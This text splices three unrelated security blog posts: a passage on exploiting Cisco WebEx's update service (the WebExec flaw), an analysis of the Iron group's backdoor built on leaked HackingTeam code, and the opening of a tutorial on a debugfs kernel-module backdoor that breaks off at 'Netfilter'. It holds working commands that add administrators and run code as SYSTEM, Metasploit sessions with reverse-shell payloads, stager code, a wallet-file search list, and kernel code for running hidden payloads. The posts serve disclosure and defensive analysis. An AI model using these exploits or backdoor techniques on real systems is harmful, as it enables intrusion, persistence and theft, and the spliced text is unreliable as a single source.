I looked up wcstod() online, and it’s another of Microsoft’s cleverly named functions. This one converts a string to a number. If it fails, the code references something called std::_Xinvalid_argument. I don’t know exactly what it does from there, but we can assume that it’s looking for a number somewhere.

This is where my advice becomes «be lucky». The reason is, the only number that will actually work here is «1». I don’t know why, or what other numbers do, but I ended up calling the service with the commandline:

C:\Users\ron>sc start webexservice a software-update 1 2 3 4 5 6

And checked the event log:

  StartUpdateProcess::CreateProcessAsUser:1;1;2 3 4 5 6(18).

That looks awfully promising! I changed 2 to an actual process:

  C:\Users\ron>sc start webexservice a software-update 1 calc c d e f

And it opened!

C:\Users\ron>tasklist | find "calc"
calc.exe                      1476 Console                    1     10,804 K

It actually runs with a GUI, too, so that’s kind of unnecessary. I could literally see it! And it’s running as SYSTEM!

Speaking of unknowns, running cmd.exe and powershell the same way does not appear to work. We can, however, run wmic.exe and net.exe, so we have some choices!

Local exploit

The simplest exploit is to start cmd.exe with wmic.exe:

C:\Users\ron>sc start webexservice a software-update 1 wmic process call create "cmd.exe"

That opens a GUI cmd.exe instance as SYSTEM:

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

If we can’t or choose not to open a GUI, we can also escalate privileges:

C:\Users\ron>net localgroup administrators
[...]
Administrator
ron

C:\Users\ron>sc start webexservice a software-update 1 net localgroup administrators testuser /add
[...]

C:\Users\ron>net localgroup administrators
[...]
Administrator
ron
testuser

And this all works as an unprivileged user!

Jeff wrote a local module for Metasploit to exploit the privilege escalation vulnerability. If you have a non-SYSTEM session on the affected machine, you can use it to gain a SYSTEM account:

meterpreter > getuid
Server username: IEWIN7\IEUser

meterpreter > background
[*] Backgrounding session 2...

msf exploit(multi/handler) > use exploit/windows/local/webexec
msf exploit(windows/local/webexec) > set SESSION 2
SESSION => 2

msf exploit(windows/local/webexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/local/webexec) > set LHOST 172.16.222.1
msf exploit(windows/local/webexec) > set LPORT 9001
msf exploit(windows/local/webexec) > run

[*] Started reverse TCP handler on 172.16.222.1:9001
[*] Checking service exists...
[*] Writing 73802 bytes to %SystemRoot%\Temp\yqaKLvdn.exe...
[*] Launching service...
[*] Sending stage (179779 bytes) to 172.16.222.132
[*] Meterpreter session 2 opened (172.16.222.1:9001 -> 172.16.222.132:49574) at 2018-08-31 14:45:25 -0700
[*] Service started...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Remote exploit

We actually spent over a week knowing about this vulnerability without realizing that it could be used remotely! The simplest exploit can still be done with the Windows sc command. Either create a session to the remote machine or create a local user with the same credentials, then run cmd.exe in the context of that user (runas /user:newuser cmd.exe). Once that’s done, you can use the exact same command against the remote host:

c:\>sc \\10.0.0.0 start webexservice a software-update 1 net localgroup administrators testuser /add

The command will run (and a GUI will even pop up!) on the other machine.

Remote exploitation with Metasploit

To simplify this attack, I wrote a pair of Metasploit modules. One is an auxiliary module that implements this attack to run an arbitrary command remotely, and the other is a full exploit module. Both require a valid SMB account (local or domain), and both mostly depend on the WebExec library that I wrote.

Here is an example of using the auxiliary module to run calc on a bunch of vulnerable machines:

msf5 > use auxiliary/admin/smb/webexec_command
msf5 auxiliary(admin/smb/webexec_command) > set RHOSTS 192.168.1.100-110
RHOSTS => 192.168.56.100-110
msf5 auxiliary(admin/smb/webexec_command) > set SMBUser testuser
SMBUser => testuser
msf5 auxiliary(admin/smb/webexec_command) > set SMBPass testuser
SMBPass => testuser
msf5 auxiliary(admin/smb/webexec_command) > set COMMAND calc
COMMAND => calc
msf5 auxiliary(admin/smb/webexec_command) > exploit

[-] 192.168.56.105:445    - No service handle retrieved
[+] 192.168.56.105:445    - Command completed!
[-] 192.168.56.103:445    - No service handle retrieved
[+] 192.168.56.103:445    - Command completed!
[+] 192.168.56.104:445    - Command completed!
[+] 192.168.56.101:445    - Command completed!
[*] 192.168.56.100-110:445 - Scanned 11 of 11 hosts (100% complete)
[*] Auxiliary module execution completed

And here’s the full exploit module:

msf5 > use exploit/windows/smb/webexec
msf5 exploit(windows/smb/webexec) > set SMBUser testuser
SMBUser => testuser
msf5 exploit(windows/smb/webexec) > set SMBPass testuser
SMBPass => testuser
msf5 exploit(windows/smb/webexec) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/webexec) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(windows/smb/webexec) > exploit

[*] 192.168.56.101:445 - Connecting to the server...
[*] 192.168.56.101:445 - Authenticating to 192.168.56.101:445 as user 'testuser'...
[*] 192.168.56.101:445 - Command Stager progress -   0.96% done (999/104435 bytes)
[*] 192.168.56.101:445 - Command Stager progress -   1.91% done (1998/104435 bytes)
...
[*] 192.168.56.101:445 - Command Stager progress -  98.52% done (102891/104435 bytes)
[*] 192.168.56.101:445 - Command Stager progress -  99.47% done (103880/104435 bytes)
[*] 192.168.56.101:445 - Command Stager progress - 100.00% done (104435/104435 bytes)
[*] Started bind TCP handler against 192.168.56.101:4444
[*] Sending stage (179779 bytes) to 192.168.56.101

The actual implementation is mostly straight forward if you look at the code linked above, but I wanted to specifically talk about the exploit module, since it had an interesting problem: how do you initially get a meterpreter .exe uploaded to execute it?

I started by using a psexec-like exploit where we upload the .exe file to a writable share, then execute it via WebExec. That proved problematic, because uploading to a share frequently requires administrator privileges, and at that point you could simply use psexecinstead. You lose the magic of WebExec!

After some discussion with Egyp7, I realized I could use the Msf::Exploit::CmdStager mixin to stage the command to an .exe file to the filesystem. Using the .vbs flavor of staging, it would write a Base64-encoded file to the disk, then a .vbs stub to decode and execute it!

There are several problems, however:

  • The max line length is ~1200 characters, whereas the CmdStager mixin uses ~2000 characters per line
  • CmdStager uses %TEMP% as a temporary directory, but our exploit doesn’t expand paths
  • WebExecService seems to escape quotation marks with a backslash, and I’m not sure how to turn that off

The first two issues could be simply worked around by adding options (once I’d figured out the options to use):

wexec(true) do |opts|
  opts[:flavor] = :vbs
  opts[:linemax] = datastore["MAX_LINE_LENGTH"]
  opts[:temp] = datastore["TMPDIR"]
  opts[:delay] = 0.05
  execute_cmdstager(opts)
end

execute_cmdstager() will execute execute_command() over and over to build the payload on-disk, which is where we fix the final issue:

# This is the callback for cmdstager, which breaks the full command into
# chunks and sends it our way. We have to do a bit of finangling to make it
# work correctly
def execute_command(command, opts)
  # Replace the empty string, "", with a workaround - the first 0 characters of "A"
  command = command.gsub('""', 'mid(Chr(65), 1, 0)')

  # Replace quoted strings with Chr(XX) versions, in a naive way
  command = command.gsub(/"[^"]*"/) do |capture|
    capture.gsub(/"/, "").chars.map do |c|
      "Chr(#{c.ord})"
    end.join('+')
  end

  # Prepend "cmd /c" so we can use a redirect
  command = "cmd /c " + command

  execute_single_command(command, opts)
end

First, it replaces the empty string with mid(Chr(65), 1, 0), which works out to characters 1 — 1 of the string «A». Or the empty string!

Second, it replaces every other string with Chr(n)+Chr(n)+.... We couldn’t use &, because that’s already used by the shell to chain commands. I later learned that we can escape it and use ^&, which works just fine, but + is shorter so I stuck with that.

And finally, we prepend cmd /c to the command, which lets us echo to a file instead of just passing the > symbol to the process. We could probably use ^> instead.

In a targeted attack, it’s obviously possible to do this much more cleanly, but this seems to be a great way to do it generically!

Checking for the patch

This is one of those rare (or maybe not so rare?) instances where exploiting the vulnerability is actually easier than checking for it!

The patched version of WebEx still allows remote users to connect to the process and start it. However, if the process detects that it’s being asked to run an executable that is not signed by WebEx, the execution will halt. Unfortunately, that gives us no information about whether a host is vulnerable!

There are a lot of targeted ways we could validate whether code was run. We could use a DNS request, telnet back to a specific port, drop a file in the webroot, etc. The problem is that unless we have a generic way to check, it’s no good as a script!

In order to exploit this, you have to be able to get a handle to the service-controlservice (svcctl), so to write a checker, I decided to install a fake service, try to start it, then delete the service. If starting the service returns either OK or ACCESS_DENIED, we know it worked!

Here’s the important code from the Nmap checker module we developed:

-- Create a test service that we can query
local webexec_command = "sc create " .. test_service .. " binpath= c:\\fakepath.exe"
status, result = msrpc.svcctl_startservicew(smbstate, open_service_result['handle'], stdnse.strsplit(" ", "install software-update 1 " .. webexec_command))

-- ...

local test_status, test_result = msrpc.svcctl_openservicew(smbstate, open_result['handle'], test_service, 0x00000)

-- If the service DOES_NOT_EXIST, we couldn't run code
if string.match(test_result, 'DOES_NOT_EXIST') then
  stdnse.debug("Result: Test service does not exist: probably not vulnerable")
  msrpc.svcctl_closeservicehandle(smbstate, open_result['handle'])

  vuln.check_results = "Could not execute code via WebExService"
  return report:make_output(vuln)
end

Not shown: we also delete the service once we’re finished.

Conclusion

So there you have it! Escalating privileges from zero to SYSTEM using WebEx’s built-in update service! Local and remote! Check out webexec.org for tools and usage instructions!

Iron Group’s Malware using HackingTeam’s Leaked RCS source code with VMProtected Installer — Technical Analysis

In April 2018, while monitoring public data feeds, we noticed an interesting and previously unknown backdoor using HackingTeam’s leaked RCS source code. We discovered that this backdoor was developed by the Iron cybercrime group, the same group behind the Iron ransomware (rip-off Maktub ransomware recently discovered by Bart Parys), which we believe has been active for the past 18 months.

During the past year and a half, the Iron group has developed multiple types of malware (backdoors, crypto-miners, and ransomware) for Windows, Linux and Android platforms. They have used their malware to successfully infect, at least, a few thousand victims.

In this technical blog post we are going to take a look at the malware samples found during the research.

Technical Analysis:

Installer:

** This installer sample (and in general most of the samples found) is protected with VMProtect then compressed using UPX.

Installation process:

1. Check if the binary is executed on a VM, if so – ExitProcess

2. Drop & Install malicious chrome extension
%localappdata%\Temp\chrome.crx
3. Extract malicious chrome extension to %localappdata%\Temp\chrome & create a scheduled task to execute %localappdata%\Temp\chrome\sec.vbs.
4. Create mutex using the CPU’s version to make sure there’s no existing running instance of itself.
5. Drop backdoor dll to %localappdata%\Temp\\<random>.dat.
6. Check OS version:
.If Version == Windows XP then just invoke ‘Launch’ export of Iron Backdoor for a one-time non persistent execution.
.If Version > Windows XP
-Invoke ‘Launch’ export
-Check if Qhioo360 – only if not proceed, Install malicious certificate used to sign Iron Backdoor binary as root CA.Then create a service called ‘helpsvc’ pointing back to Iron Backdoor dll.

Using the leaked HackingTeam source code:

Once we Analyzed the backdoor sample, we immediately noticed it’s partially based on HackingTeam’s source code for their Remote Control System hacking tool, which leaked about 3 years ago. Further analysis showed that the Iron cybercrime group used two main functions from HackingTeam’s source in both IronStealer and Iron ransomware.

1.Anti-VM: Iron Backdoor uses a virtual machine detection code taken directly from HackingTeam’s “Soldier” implant leaked source code. This piece of code supports detecting Cuckoo Sandbox, VMWare product & Oracle’s VirtualBox. Screenshot:

 

2. Dynamic Function Calls: Iron Backdoor is also using the DynamicCall module from HackingTeam’s “core” library. This module is used to dynamically call external library function by obfuscated the function name, which makes static analysis of this malware more complex.
In the following screenshot you can see obfuscated “LFSOFM43/EMM” and “DsfbufGjmfNbqqjohB”, which represents “kernel32.dll” and “CreateFileMappingA” API.

For a full list of obfuscated APIs you can visit obfuscated_calls.h.

Malicious Chrome extension:

A patched version of the popular Adblock Plus chrome extension is used to inject both the in-browser crypto-mining module (based on CryptoNoter) and the in-browser payment hijacking module.


**patched include.preload.js injects two malicious scripts from the attacker’s Pastebin account.

The malicious extension is not only loaded once the user opens the browser, but also constantly runs in the background, acting as a stealth host based crypto-miner. The malware sets up a scheduled task that checks if chrome is already running, every minute, if it isn’t, it will “silent-launch” it as you can see in the following screenshot:

Internet Explorer(deprecated):

Iron Backdoor itself embeds adblockplusie – Adblock Plus for IE, which is modified in a similar way to the malicious chrome extension, injecting remote javascript. It seems that this functionality is no longer automatically used for some unknown reason.

Persistence:

Before installing itself as a Windows service, the malware checks for the presence of either 360 Safe Guard or 360 Internet Security by reading following registry keys:

.SYSTEM\CurrentControlSet\Services\zhudongfangyu.
.SYSTEM\CurrentControlSet\Services\360rp

If one of these products is installed, the malware will only run once without persistence. Otherwise, the malware will proceed to installing rouge, hardcoded root CA certificate on the victim’s workstation. This fake root CA supposedly signed the malware’s binaries, which will make them look legitimate.

Comic break: The certificate is protected by the password ‘caonima123’, which means “f*ck your mom” in Mandarin.

IronStealer (<RANDOM>.dat):

Persistent backdoor, dropper and cryptocurrency theft module.

1. Load Cobalt Strike beacon:
The malware automatically decrypts hard coded shellcode stage-1, which in turn loads Cobalt Strike beacon in-memory, using a reflective loader:

Beacon: hxxp://dazqc4f140wtl.cloudfront[.]net/ZZYO

2. Drop & Execute payload: The payload URL is fetched from a hardcoded Pastebin paste address:

We observed two different payloads dropped by the malware:

1. Xagent – A variant of “JbossMiner Mining Worm” – a worm written in Python and compiled using PyInstaller for both Windows and Linux platforms. JbossMiner is using known database vulnerabilities to spread. “Xagent” is the original filename Xagent<VER>.exe whereas <VER> seems to be the version of the worm. The last version observed was version 6 (Xagent6.exe).

**Xagent versions 4-6 as seen by VT

2. Iron ransomware – We recently saw a shift from dropping Xagent to dropping Iron ransomware. It seems that the wallet & payment portal addresses are identical to the ones that Bart observed. Requested ransom decreased from 0.2 BTC to 0.05 BTC, most likely due to the lack of payment they received.

**Nobody paid so they decreased ransom to 0.05 BTC

3. Stealing cryptocurrency from the victim’s workstation: Iron backdoor would drop the latest voidtool Everything search utility and actually silent install it on the victim’s workstation using msiexec. After installation was completed, Iron Backdoor uses Everything in order to find files that are likely to contain cryptocurrency wallets, by filename patterns in both English and Chinese.

Full list of patterns extracted from sample:
– Wallet.dat
– UTC–
– Etherenum keystore filename
– *bitcoin*.txt
– *比特币*.txt
– “Bitcoin”
– *monero*.txt
– *门罗币*.txt
– “Monroe Coin”
– *litecoin*.txt
– *莱特币*.txt
– “Litecoin”
– *Ethereum*.txt
– *以太币*.txt
– “Ethereum”
– *miner*.txt
– *挖矿*.txt
– “Mining”
– *blockchain*.txt
– *coinbase*

4. Hijack on-going payments in cryptocurrency: IronStealer constantly monitors the user’s clipboard for Bitcoin, Monero & Ethereum wallet address regex patterns. Once matched, it will automatically replace it with the attacker’s wallet address so the victim would unknowingly transfer money to the attacker’s account:

Pastebin Account:

As part of the investigation, we also tried to figure out what additional information we may learn from the attacker’s Pastebin account:

The account was probably created using the mail fineisgood123@gmail[.]com – the same email address used to register blockbitcoin[.]com (the attacker’s crypto-mining pool & malware host) and swb[.]one (Old server used to host malware & leaked files. replaced by u.cacheoffer[.]tk):

1. Index.html: HTML page referring to a fake Firefox download page.
2. crystal_ext-min + angular: JS inject using malicious Chrome extension.
3. android: This paste holds a command line for an unknown backdoored application to execute on infected Android devices. This command line invokes remote Metasploit stager (android.apk) and drops cpuminer 2.3.2 (minerd.txt) built for ARM processor. Considering the last update date (18/11/17) and the low number of views, we believe this paste is obsolete.

4. androidminer: Holds the cpuminer command line to execute for unknown malicious android applications, at the time of writing this post, this paste received nearly 2000 hits.

Aikapool[.]com is a public mining pool and port 7915 is used for DogeCoin:

The username (myapp2150) was used to register accounts in several forums and on Reddit. These accounts were used to advertise fake “blockchain exploit tool”, which infects the victim’s machine with Cobalt Strike, using a similar VBScript to the one found by Malwrologist (ps5.sct).

XAttacker: Copy of XAttacker PHP remote file upload script.
miner: Holds payload URL, as mentioned above (IronStealer).

FAQ:

How many victims are there?
It is hard to define for sure, , but to our knowledge, the total of the attacker’s pastes received around 14K views, ~11K for dropped payload URL and ~2k for the android miner paste. Based on that, we estimate that the group has successfully infected, a few thousands victims.

Who is Iron group?
We suspect that the person or persons behind the group are Chinese, due in part to the following findings:
. There were several leftover comments in the plugin in Chinese.
. Root CA Certificate password (‘f*ck your mom123’ was in Mandarin)
We also suspect most of the victims are located in China, because of the following findings:
. Searches for wallet file names in Chinese on victims’ workstations.
. Won’t install persistence if Qhioo360(popular Chinese AV) is found

IOCS:

 

  • blockbitcoin[.]com
  • pool.blockbitcoin[.]com
  • ssl2.blockbitcoin[.]com
  • xmr.enjoytopic[.]tk
  • down.cacheoffer[.]tk
  • dzebppteh32lz.cloudfront[.]net
  • dazqc4f140wtl.cloudfront[.]net
  • androidapt.s3-accelerate.amazonaws[.]com
  • androidapt.s3-accelerate.amazonaws[.]com
  • winapt.s3-accelerate.amazonaws[.]com
  • swb[.]one
  • bitcoinwallet8[.]com
  • blockchaln[.]info
  • 6350a42d423d61eb03a33011b6054fb7793108b7e71aee15c198d3480653d8b7
  • a4faaa0019fb63e55771161e34910971fd8fe88abda0ab7dd1c90cfe5f573a23
  • ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9
  • 654ec27ea99c44edc03f1f3971d2a898b9f1441de156832d1507590a47b41190
  • 980a39b6b72a7c8e73f4b6d282fae79ce9e7934ee24a88dde2eead0d5f238bda
  • 39a991c014f3093cdc878b41b527e5507c58815d95bdb1f9b5f90546b6f2b1f6
  • a3c8091d00575946aca830f82a8406cba87aa0b425268fa2e857f98f619de298
  • 0f7b9151f5ff4b35761d4c0c755b6918a580fae52182de9ba9780d5a1f1beee8
  • ea338755e8104d654e7d38170aaae305930feabf38ea946083bb68e8d76a0af3
  • 4de16be6a9de62b1ff333dd94e63128e677eb6a52d9fbbe55d8a09a2cab161f1
  • 92b4eed5d17cb9892a9fe146d61787025797e147655196f94d8eaf691c34be8c
  • 6314162df5bc2db1200d20221641abaac09ac48bc5402ec29191fd955c55f031
  • 7f3c07454dab46b27e11fcefd0101189aa31e84f8498dcb85db2b010c02ec190
  • 927e61b57c124701f9d22abbc72f34ebe71bf1cd717719f8fc6008406033b3e9
  • f1cbacea1c6d05cd5aa6fc9532f5ead67220d15008db9fa29afaaf134645e9de
  • 1d34a52f9c11d4bf572bf678a95979046804109e288f38dfd538a57a12fc9fd1
  • 2f5fb4e1072044149b32603860be0857227ed12cde223b5be787c10bcedbc51a
  • 0df1105cbd7bb01dca7e544fb22f45a7b9ad04af3ffaf747b5ecc2ffcd8c6dee
  • 388c1aecdceab476df8619e2d722be8e5987384b08c7b810662e26c42caf1310
  • 0b8473d3f07a29820f456b09f9dc28e70af75f9dec88668fb421a315eec9cb63
  • 251345b721e0587f1f08f54a81e26abac075acf3c4473a2c3ba8efcedc3b2459
  • b1fe223cbb01ff2a658c8ff51d386b5df786fd36278ee081c714adf946145047
  • 2886e25a86a57355a8a09a84781a9b032de10c3e40339a9ad0c10b63f7f8e7c7
  • 1d17eb102e75c08ab6f54387727b12ec9f9ee1960c8e5dc7f9925d41a943cabf
  • 5831dabe27e0211028296546d4e637770fd1ec5f2c8c5add51d0ea09b6ea3f0d
  • 85b0d44f3e8fd636a798960476a1f71d6fe040fbe44c92dfa403d0d014ff66cc
  • 936f4ce3570017ef5db14fb68f5e775a417b65f3b07094475798f24878d84907
  • 484b4cd953c9993090947fbb31626b76d7eee60c106867aa17e408556d27b609
  • 1cbd51d387561cafddf10699177a267cd5d2d184842bb43755a0626fdc4f0f3c
  • e41a805d780251cb591bcd02e5866280f8a99f876cfa882b557951e30dfdd142
  • b8107197469839a82cae25c3d3b5c25b5c0784736ca3b611eb3e8e3ced8ec950
  • b0442643d321003af965f0f41eb90cff2a198d11b50181ef8b6f530dd22226a7
  • 657a3a4a78054b8d6027a39a5370f26665ee10e46673a1f4e822a2a31168e5f9
  • 5977bee625ed3e91c7f30b09be9133c5838c59810659057dcfd1a5e2cf7c1936
  • 9ea69b49b6707a249e001b5f2caaab9ee6f6f546906445a8c51183aafe631e9f
  • 283536c26bb4fd4ea597d59c77a84ab812656f8fe980aa8556d44f9e954b1450
  • 21f1a867fa6a418067be9c68d588e2eeba816bffcb10c9512f3b7927612a1221
  • 45f794304919c8aa9282b0ee84c198703a41cc2254fe93634642ada3511239d2
  • 70e47fdff286fdfe031d05488bc727f5df257eacaa0d29431fb69ce680f6fb0c
  • ce7161381a0a0495ef998b5e202eb3e8fa2945dfdba0fd2a612d68b986c92678
  • b8d548ab2a1ce0cf51947e63b37fe57a0c9b105b2ef36b0abc1abf26d848be00
  • 74e777af58a8ee2cff4f9f18013e5b39a82a4c4f66ea3e17d06e5356085265b7
  • cd4d1a6b3efb3d280b8d4e77e306e05157f6ef8a226d7db08ac2006cce95997c
  • 78a07502443145d762536afaabd4d6139b81ca3cc9f8c28427ec724a3107e17b
  • 729ab4ff5da471f210a8658f4a7b2a30522534a212ac44e4d76f258baab19ccb
  • ca0df32504d3cf78d629e33b055213df5f71db3d5a0313ebc07fe2c05e506826
  • fc9d150d1a7cbda2600e4892baad91b9a4b8c52d31a41fd686c21c7801d1dd8c
  • bf2984b866c449a8460789de5871864eec19a7f9cadd7d883898135a4898a38a
  • 9d817d77b651d2627e37c01037e13808e1047f9528799a435c7bc04e877d70b3
  • 8fdec2e23032a028b8bd326dc709258a2f705c605f6222fc0c1616912f246f91
  • dbe165a63ed14e6c9bdcd314cf54d173e68db9d36623b09057d0a4d0519f1306
  • 64f96042ab880c0f2cd4c39941199806737957860387a65939b656d7116f0c7e
  • e394b1a1561c94621dbd63f7b8ea7361485a1f903f86800d50bd7e27ad801a5f
  • 506647c5bfad858ff6c34f93c74407782abbac4da572d9f44112fee5238d9ae1
  • 194362ce71adcdfa0fe976322a7def8bb2d7fb3d67a44716aa29c2048f87f5bc
  • 3652ea75ce5d8cfa0000a40234ae3d955781bcb327eecfee8f0e2ecae3a82870
  • 97d41633e74eccf97918d248b344e62431b74c9447032e9271ed0b5340e1dba0
  • a8ab5be12ca80c530e3ef5627e97e7e38e12eaf968bf049eb58ccc27f134dc7f
  • 37bea5b0a24fa6fed0b1649189a998a0e51650dd640531fe78b6db6a196917a7
  • 7e750be346f124c28ddde43e87d0fbc68f33673435dddb98dda48aa3918ce3bd
  • fcb700dbb47e035f5379d9ce1ada549583d4704c1f5531217308367f2d4bd302
  • b638dcce061ed2aa5a1f2d56fc5e909aa1c1a28636605a3e4c0ad72d49b7aec6
  • f2e4528049f598bdb25ce109a669a1f446c6a47739320a903a9254f7d3c69427
  • afd7ab6b06b87545c3a6cdedfefa63d5777df044d918a505afe0f57179f246e9
  • 9b654fd24a175784e3103d83eba5be6321142775cf8c11c933746d501ca1a5a1
  • e6c717b06d7ded23408461848ad0ee734f77b17e399c6788e68bc15219f155d7
  • e302aa06ad76b7e26e7ba2c3276017c9e127e0f16834fb7c8deae2141db09542
  • d020ea8159bb3f99f394cd54677e60fadbff2b91e1a2e91d1c43ba4d7624244d
  • 36104d9b7897c8b550a9fad9fe2f119e16d82fb028f682d39a73722822065bd3
  • d20cd3e579a04c5c878b87cc7bd6050540c68fdd8e28f528f68d70c77d996b16
  • ee859581b2fcea5d4ff633b5e40610639cd6b11c2b4fc420720198f49fbd1d31
  • ef2c384c795d5ca8ce17394e278b5c98f293a76047a06fc672da38bb56756aec
  • bd56db8d304f36af7cb0380dcbbc3c51091e3542261affb6caac18fa6a6988ec
  • 086d989f14e14628af821b72db00d0ef16f23ba4d9eaed2ec03d003e5f3a96a1
  • f44c3fd546b8c74cc58630ebcb5bea417696fac4bb89d00da42202f40da31354
  • 320bb1efa1263c636702188cd97f68699aebbb88c2c2c92bf97a68e689fa6f89
  • 42faf3af09b955de1aead2b99a474801b2c97601a52541af59d35711fafb7c6d
  • 6e0adfd1e30c116210f469d76e60f316768922df7512d40d5faf65820904821b
  • eea2d72f3c9bed48d4f5c5ad2bef8b0d29509fc9e650655c6c5532cb39e03268
  • 1a31e09a2a982a0fedd8e398228918b17e1bde6b20f1faf291316e00d4a89c61
  • 042efe5c5226dd19361fb832bdd29267276d7fa7a23eca5ced3c2bb7b4d30f7d
  • 274717d4a4080a6f2448931832f9eeb91cc0cbe69ff65f2751a9ace86a76e670
  • f8751a004489926ceb03321ea3494c54d971257d48dadbae9e8a3c5285bd6992
  • d5a296bac02b0b536342e8fb3b9cb40414ea86aa602353bc2c7be18386b13094
  • 49cfeb6505f0728290286915f5d593a1707e15effcfb62af1dd48e8b46a87975
  • 5f2b13cb2e865bb09a220a7c50acc3b79f7046c6b83dbaafd9809ecd00efc49a
  • 5a5bbc3c2bc2d3975bc003eb5bf9528c1c5bf400fac09098490ea9b5f6da981f
  • 2c025f9ffb7d42fcc0dc8d056a444db90661fb6e38ead620d325bee9adc2750e
  • aaa6ee07d1c777b8507b6bd7fa06ed6f559b1d5e79206c599a8286a0a42fe847
  • ac89400597a69251ee7fc208ad37b0e3066994d708e15d75c8b552c50b57f16a
  • a11bf4e721d58fcf0f44110e17298f6dc6e6c06919c65438520d6e90c7f64d40
  • 017bdd6a7870d120bd0db0f75b525ddccd6292a33aee3eecf70746c2d37398bf
  • ae366fa5f845c619cacd583915754e655ad7d819b64977f819f3260277160141
  • 9b40a0cd49d4dd025afbc18b42b0658e9b0707b75bb818ab70464d8a73339d52
  • 57daa27e04abfbc036856a22133cbcbd1edb0662617256bce6791e7848a12beb
  • 6c54b73320288c11494279be63aeda278c6932b887fc88c21c4c38f0e18f1d01
  • ba644e050d1b10b9fd61ac22e5c1539f783fe87987543d76a4bb6f2f7e9eb737
  • 21a83eeff87fba78248b137bfcca378efcce4a732314538d2e6cd3c9c2dd5290
  • 2566b0f67522e64a38211e3fe66f340daaadaf3bcc0142f06f252347ebf4dc79
  • 692ae8620e2065ad2717a9b7a1958221cf3fcb7daea181b04e258e1fc2705c1e
  • 426bc7ffabf01ebfbcd50d34aecb76e85f69e3abcc70e0bcd8ed3d7247dba76e

Misusing debugfs for In-Memory RCE

An explanation of how debugfs and nf hooks can be used to remotely execute code.

Картинки по запросу debugfs

Introduction

Debugfs is a simple-to-use RAM-based file system specially designed for kernel debugging purposes. It was released with version 2.6.10-rc3 and written by Greg Kroah-Hartman. In this post, I will be showing you how to use debugfs and Netfilter hooks to create a Loadable Kernel Module capable of executing code remotely entirely in RAM.

An attacker’s ideal process would be to first gain unprivileged access to the target, perform a local privilege escalation to gain root access, insert the kernel module onto the machine as a method of persistence, and then pivot to the next target.

Note: The following is tested and working on clean images of Ubuntu 12.04 (3.13.0-32), Ubuntu 14.04 (4.4.0-31), Ubuntu 16.04 (4.13.0-36). All development was done on Arch throughout a few of the most recent kernel versions (4.16+).

Practicality of a debugfs RCE

When diving into how practical using debugfs is, I needed to see how prevalent it was across a variety of systems.

For every Ubuntu release from 6.06 to 18.04 and CentOS versions 6 and 7, I created a VM and checked the three statements below. This chart details the answers to each of the questions for each distro. The main thing I was looking for was to see if it was even possible to mount the device in the first place. If that was not possible, then we won’t be able to use debugfs in our backdoor.

Fortunately, every distro, except Ubuntu 6.06, was able to mount debugfs. Every Ubuntu version from 10.04 and on as well as CentOS 7 had it mounted by default.

  1. Present: Is /sys/kernel/debug/ present on first load?
  2. Mounted: Is /sys/kernel/debug/ mounted on first load?
  3. Possible: Can debugfs be mounted with sudo mount -t debugfs none /sys/kernel/debug?
Operating System Present Mounted Possible
Ubuntu 6.06 No No No
Ubuntu 8.04 Yes No Yes
Ubuntu 10.04* Yes Yes Yes
Ubuntu 12.04 Yes Yes Yes
Ubuntu 14.04** Yes Yes Yes
Ubuntu 16.04 Yes Yes Yes
Ubuntu 18.04 Yes Yes Yes
Centos 6.9 Yes No Yes
Centos 7 Yes Yes Yes
  • *debugfs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs
  • **tracefs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs/tracing

Executing code on debugfs

Once I determined that debugfs is prevalent, I wrote a simple proof of concept to see if you can execute files from it. It is a filesystem after all.

The debugfs API is actually extremely simple. The main functions you would want to use are: debugfs_initialized — check if debugfs is registered, debugfs_create_blob — create a file for a binary object of arbitrary size, and debugfs_remove — delete the debugfs file.

In the proof of concept, I didn’t use debugfs_initialized because I know that it’s present, but it is a good sanity-check.

To create the file, I used debugfs_create_blob as opposed to debugfs_create_file as my initial goal was to execute ELF binaries. Unfortunately I wasn’t able to get that to work — more on that later. All you have to do to create a file is assign the blob pointer to a buffer that holds your content and give it a length. It’s easier to think of this as an abstraction to writing your own file operations like you would do if you were designing a character device.

The following code should be very self-explanatory. dfs holds the file entry and myblob holds the file contents (pointer to the buffer holding the program and buffer length). I simply call the debugfs_create_blob function after the setup with the name of the file, the mode of the file (permissions), NULL parent, and lastly the data.

struct dentry *dfs = NULL;
struct debugfs_blob_wrapper *myblob = NULL;

int create_file(void){
	unsigned char *buffer = "\
#!/usr/bin/env python\n\
with open(\"/tmp/i_am_groot\", \"w+\") as f:\n\
	f.write(\"Hello, world!\")";

	myblob = kmalloc(sizeof *myblob, GFP_KERNEL);
	if (!myblob){
		return -ENOMEM;
	}

	myblob->data = (void *) buffer;
	myblob->size = (unsigned long) strlen(buffer);

	dfs = debugfs_create_blob("debug_exec", 0777, NULL, myblob);
	if (!dfs){
		kfree(myblob);
		return -EINVAL;
	}
	return 0;
}

Deleting a file in debugfs is as simple as it can get. One call to debugfs_remove and the file is gone. Wrapping an error check around it just to be sure and it’s 3 lines.

void destroy_file(void){
	if (dfs){
		debugfs_remove(dfs);
	}
}

Finally, we get to actually executing the file we created. The standard and as far as I know only way to execute files from kernel-space to user-space is through a function called call_usermodehelper. M. Tim Jones wrote an excellent article on using UMH called Invoking user-space applications from the kernel, so if you want to learn more about it, I highly recommend reading that article.

To use call_usermodehelper we set up our argv and envp arrays and then call the function. The last flag determines how the kernel should continue after executing the function (“Should I wait or should I move on?”). For the unfamiliar, the envp array holds the environment variables of a process. The file we created above and now want to execute is /sys/kernel/debug/debug_exec. We can do this with the code below.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

	call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

I would now recommend you try the PoC code to get a good feel for what is being done in terms of actually executing our program. To check if it worked, run ls /tmp/ and see if the file i_am_groot is present.

Netfilter

